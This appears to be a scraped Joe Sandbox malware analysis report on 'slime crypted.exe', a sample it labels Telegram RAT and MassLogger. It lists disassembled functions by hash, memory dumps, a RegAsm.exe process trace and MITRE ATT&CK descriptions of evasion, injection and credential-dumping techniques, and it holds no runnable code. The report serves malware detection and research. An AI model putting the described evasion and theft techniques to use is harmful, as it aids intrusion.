Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acb8c3a90634e7398669cb7204872767893f9d9d478f8f5d14e88554ae2bd778
Instruction ID: 279209e4c3179065c5c7affb7d77c72a98489c165f2178ff3d572a56f6e8bfb8
Opcode Fuzzy Hash: acb8c3a90634e7398669cb7204872767893f9d9d478f8f5d14e88554ae2bd778
Instruction Fuzzy Hash: 1DF15D70A00209DFDB09DFA9D958AADBBB6FF88300F108469E41AAB395DF35DC55CB41

Function 053D0130 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049393981.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53d0000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0235b8fccd39fffd64fbe466733292b68600bbd5b2155928434f9dde08a0102e
Instruction ID: 121a09f8b3eda22dff5351536520000dc9bf9d9f31fb3c1b0969fb3ff087dfcd
Opcode Fuzzy Hash: 0235b8fccd39fffd64fbe466733292b68600bbd5b2155928434f9dde08a0102e
Instruction Fuzzy Hash: AE12A6F0C827458AD330CF25E86C9C93BB1BB45399BD44E09D165AB2E1EBB4116ACF64

Function 0109E0C4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047500903.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23d20f4bc2dfcce851823976587bfe8def37bcdc73cbcbe134106100433c0735
Instruction ID: a54b04e8b490d2c1054c0d87bafbfa9ef8abaf6cc945231d3c6f749a98142fd7
Opcode Fuzzy Hash: 23d20f4bc2dfcce851823976587bfe8def37bcdc73cbcbe134106100433c0735
Instruction Fuzzy Hash: F2A17D36E002169FCF05DFB4C8504DEBBB2FF85300B1545AAE945EB265EB31E916DB80

Function 053D0120 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049393981.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53d0000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5753dbb58abc3347fdfc906e3ea9b3066a6776fe7bc0e76496c82cdfe7b1f4e0
Instruction ID: 6e2891bfc950d19c523543dbd016dc151f2bf5f70ad84b005ac529141535c5e7
Opcode Fuzzy Hash: 5753dbb58abc3347fdfc906e3ea9b3066a6776fe7bc0e76496c82cdfe7b1f4e0
Instruction Fuzzy Hash: FAC12BB1C827458BD730CF25E8685C97BB1BB85394FA44F09D161AF2E0EBB414AACF54

Analysis Process: RegAsm.exePID: 4220, Parent PID: 6600COMMON

Execution Graph

Execution Coverage:	21.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	25%
Total number of Nodes:	28
Total number of Limit Nodes:	3

Executed Functions

Function 0142C168 Relevance: 2.0, APIs: 1, Instructions: 530
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4504517729.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1420000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55ab9801ead086cc379a1144a25b763d8b016e1fd68a221308f13e304e257fe8
Instruction ID: f30e3faa5a4b07ee274c122dad050bbc77813b4a5f1f32183b93a461900ec37b
Opcode Fuzzy Hash: 55ab9801ead086cc379a1144a25b763d8b016e1fd68a221308f13e304e257fe8
Instruction Fuzzy Hash: 90224E70E00229CFDB14DFA9C984B9DBBB2BF88310F5485AAD409A7365DB359D86CF50

Function 01424F08 Relevance: .3, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4504517729.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1420000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45bc70c9ebfaa25a37ba15c7a4290e041928c8e72fe88cd1063a466f88405272
Instruction ID: b3b69ba616508930372721727b8220d32b399c3c7cd38343190da66559cf24a3
Opcode Fuzzy Hash: 45bc70c9ebfaa25a37ba15c7a4290e041928c8e72fe88cd1063a466f88405272
Instruction Fuzzy Hash: 99C1B374E01218CFDB54DFA5D994B9DBBB2BF88300F1085AAD809AB365DB355E85CF10

Function 01425366 Relevance: .2, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4504517729.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1420000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35cd3c25cbd5d95cf81d88f2cfd7d4249374753a9993109392d3467cb5277f07
Instruction ID: de611ca348b5ce544bbe5cdc53a9467d4e854c3f81ad335955a3f3e1283c5b4e
Opcode Fuzzy Hash: 35cd3c25cbd5d95cf81d88f2cfd7d4249374753a9993109392d3467cb5277f07
Instruction Fuzzy Hash: BCA10470D00218CFEB14DFA9D598BDDBBB1FF88310F20826AD409AB2A5DB749985CF50

Function 014256AF Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4504517729.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1420000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44e7b406a9abf5b695979a703be11d45b85ed2ada0c3980a95345b0afdb90fba
Instruction ID: e5ad3ce635f0e1dea2fe9b3ae9c87e921e9363901c46a80a21d02516c198585f
Opcode Fuzzy Hash: 44e7b406a9abf5b695979a703be11d45b85ed2ada0c3980a95345b0afdb90fba
Instruction Fuzzy Hash: 4991F370D00218CFDB10DFA8D588BEDBBB1FF48311F60866AE509AB2A5DB749985CF14

Function 0142C76C Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 0142C8AE

Memory Dump Source

Source File: 00000003.00000002.4504517729.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1420000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 88cf52b03810dd68b214a0048a81ad28d4f7a4fd35bf64e750669e768fa93dee
Instruction ID: 04a487e9ab4e9715414056a54f498400497aea7adb650361255bb93f349023c9
Opcode Fuzzy Hash: 88cf52b03810dd68b214a0048a81ad28d4f7a4fd35bf64e750669e768fa93dee
Instruction Fuzzy Hash: 28117FB4E011198FDB05DFA9D4C4AEDBBB5FF88315F94C126E804A7252D770E981CB50

Function 0137D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4504264397.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_137d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cca867d652e8d00e375a4699d3ab418f64f4e227d8ae6939b04d827dd41cec3
Instruction ID: 4c806b3d03aef1ad8652399de14974f1e70ece4bffa77f6bee2d748f5874af4f
Opcode Fuzzy Hash: 6cca867d652e8d00e375a4699d3ab418f64f4e227d8ae6939b04d827dd41cec3
Instruction Fuzzy Hash: 85212271504204DFCB26DFA8D980F26BBA5FF84318F24C56DD9094B256C33ED446CA62

Function 0137D006 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4504264397.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_137d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef19fcf661e3b2b802992742e8952cb5491b63d619e9560a7c285daad0a32f2
Instruction ID: b19bc992cdf1d181951da7d708a466b67cfa780918a6556a627a619417ecbb9b
Opcode Fuzzy Hash: 3ef19fcf661e3b2b802992742e8952cb5491b63d619e9560a7c285daad0a32f2
Instruction Fuzzy Hash: E0216B755093C08FDB13CF64D994711BF71AF46214F29C5EBC8898F6A7C23A980ACB62

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report slime crypted.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\slime crypted.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
slime crypted.exe

Function 07279330 Relevance: 1.9, Strings: 1, Instructions: 650
COMMON

Function 07174BB8 Relevance: 1.8, Strings: 1, Instructions: 526
COMMON

Function 07170CB0 Relevance: 38.1, Strings: 28, Instructions: 3075
COMMON

Function 07170CA1 Relevance: 38.0, Strings: 28, Instructions: 3035
COMMON

Function 0109D570 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Function 0109D580 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 0716E0C0 Relevance: 3.9, Strings: 3, Instructions: 114
COMMON

Function 0717C458 Relevance: 2.7, Strings: 2, Instructions: 249
COMMON

Function 07201564 Relevance: 1.9, APIs: 1, Instructions: 438
threadCOMMON

Function 07278F9C Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre